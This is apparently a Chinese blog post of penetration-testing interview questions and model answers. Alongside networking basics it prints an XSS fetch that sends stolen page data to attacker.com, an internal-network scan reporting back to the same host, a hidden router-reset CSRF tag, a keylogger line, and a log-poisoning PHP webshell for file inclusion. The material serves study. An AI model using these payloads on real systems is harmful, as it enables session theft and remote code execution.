2025年渗透测试面试题总结-2025年HW(护网面试) 57(题目+回答)

发布于:2025-07-21 ⋅ 阅读:(18) ⋅ 点赞:(0)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 57

1. Cookie属性详解

2. Cookie vs Session 区别

3. 通过XSS获取管理员Cookie后定位后台

实战步骤:

4. 后台在内网时的XSS高阶利用

替代渗透方案:

最大化利用策略:

5. HTTP请求方法

6. 专业领域强项

7. 无上传点的文件包含漏洞利用

突破思路:

8. 网络/系统原理掌握度

核心能力:

9. TCP三次握手(含标志位)

交互流程:

 2025年HW(护网面试) 57

1、xss通常是用来获取cookie,关于cookie,你了解多少,有多少属性。
2、cookie和session有什么区别
3、假设有这样一个情景,你通过xss可以拿到管理员cookie,你如何知道后台在哪里
4、如果后台在内网里,你无法登录,那么你该怎么办。如何更大效率的利用这个xss
5、HTTP请求方式
6、擅长哪一块
7、有一个网站,存在文件包含漏洞。但是没有上传点。如果是你会怎么利用
8、网络原理,和系统原理这边你怎么样
9、tcp三次握手,标志位

1. Cookie属性详解

Cookie是通过Set-Cookie头设置的键值对数据块,包含以下核心属性(RFC 6265标准):

  • Name/Value:数据主体
  • Domain:指定生效域名(如 .example.com 匹配子域名)
  • Path:限定URL路径(如 /admin
  • Expires/Max-Age:过期时间(会话Cookie在浏览器关闭后失效)
  • Secure:仅通过HTTPS传输
  • HttpOnly:禁止JavaScript访问(防XSS窃取)
  • SameSite(现代浏览器强制):
    • Strict:完全禁止跨站携带
    • Lax:允许部分安全跨站请求(如导航跳转)
    • None:允许跨站(需配合Secure)

📌 XSS利用关键:若未设置HttpOnly,攻击者可通过document.cookie 窃取Cookie实现会话劫持。


2. Cookie vs Session 区别

特性 Cookie Session
存储位置 客户端浏览器 服务端(内存/数据库)
安全性 较低(易被窃取) 较高(仅Session ID暴露)
数据大小限制 ≤4KB 无硬性限制
依赖关系 无需服务端状态 依赖Session ID(常存于Cookie)
生命周期 可长期保存 通常随会话结束销毁

⚠️ 本质关联:Session ID通常通过Cookie传递(如PHPSESSID=abc123),XSS窃取后可直接伪装用户身份。


3. 通过XSS获取管理员Cookie后定位后台

实战步骤
  1. 解析Cookie路径
    • 检查Cookie的Path属性(如Path=/admin 暗示后台路径)
  2. 扫描常见后台地址
    • 使用字典爆破:/admin, /wp-admin, /manager, /console
    • 工具:Burp Intruder / DirBuster
  3. 分析HTTP响应
    • 访问疑似路径观察状态码(302跳转→登录页 / 200→后台界面
  4. 提取页面线索
    • 通过XSS注入脚本爬取页面:
      javascriptfetch('/').then(r=>r.text()).then(data=>{ if(data.includes('Dashboard')) location='http://attacker.com?leak='+btoa(data); })

4. 后台在内网时的XSS高阶利用

替代渗透方案
  • 反向代理隧道
    利用XSS让浏览器访问内网资源并回传数据:
    javascript// 探测内网IP段(如192.168.1.x) for(let i=1; i<255; i++){ fetch(`http://192.168.1.${i}:8080/admin`, {mode:'no-cors'}) .then(() => fetch(`http://attacker.com?ip=192.168.1.${i}`)) }
  • CSRF攻击内网系统
    伪造管理员请求操作内网设备(如路由器重置):
    html<img src="http://192.168.1.1/reset?confirm=1" style="display:none"> 
  • 持久化水坑攻击
    修改页面注入永久恶意脚本,等待管理员重复触发
最大化利用策略
  1. 窃取LocalStorage/IndexedDB中敏感数据
  2. 键盘记录:document.onkeypress = e => exfil(e.key)
  3. 钓鱼伪造登录弹窗诱骗管理员输入凭证

5. HTTP请求方法

方法 幂等性 安全 主要用途
GET 获取资源(参数在URL)
POST 提交数据(表单/文件上传)
PUT 完整更新资源
DELETE 删除资源
PATCH 部分更新资源
HEAD 获取响应头(无Body)
OPTIONS 查询服务器支持的通信选项

🔐 安全提示PUT/DELETE 方法可能导致资源篡改,生产环境建议禁用。


6. 专业领域强项

  • Web安全:XSS/CSRF/SQLi/SSRF漏洞原理与利用
  • 协议分析:HTTP/TCP/DNS协议栈深度解析
  • 内网渗透:隧道技术/横向移动/权限维持
  • 漏洞挖掘:白盒审计(Java/PHP)、模糊测试

7. 无上传点的文件包含漏洞利用

突破思路
  1. 日志注入(Apache/Nginx)
    • 伪造含PHP代码的User-Agent:
      httpGET /index.php?file=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']); ?>
  2. 污染临时文件
    • 触发超大POST请求生成临时文件,包含路径如/tmp/phpXXXXXX
  3. 利用/proc目录(Linux)
    • 包含进程环境变量:?file=/proc/self/environ
    • 读取进程内存:?file=/proc/self/mem(需精确偏移)
  4. SSRF组合利用
    • 包含内网服务文件:?file=http://192.168.1.100/config

8. 网络/系统原理掌握度

核心能力
  • 网络层
    • OSI七层模型 · ARP欺骗 · VLAN跳转
    • BGP路由劫持 · DNS Rebinding攻击
  • 系统层
    • Linux权限模型(Capability/SELinux)
    • Windows ACL/Token机制
    • 进程注入(DLL/Shellcode)

9. TCP三次握手(含标志位)

交互流程
mermaidsequenceDiagram Client->>Server: SYN=1, Seq=X Server-->>Client: SYN=1, ACK=1, Seq=Y, Ack=X+1 Client->>Server: ACK=1, Seq=X+1, Ack=Y+1 
  • 标志位作用
    • SYN:同步序列号(发起连接)
    • ACK:确认数据有效(响应请求)
  • 序列号机制
    • 初始序列号(ISN)随机生成防预测
    • 确认号=对方Seq+数据长度(握手阶段长度=1)

🛡️ 安全风险:SYN Flood攻击利用半开连接耗尽服务器资源。


网站公告

今日签到

点亮在社区的每一天
去签到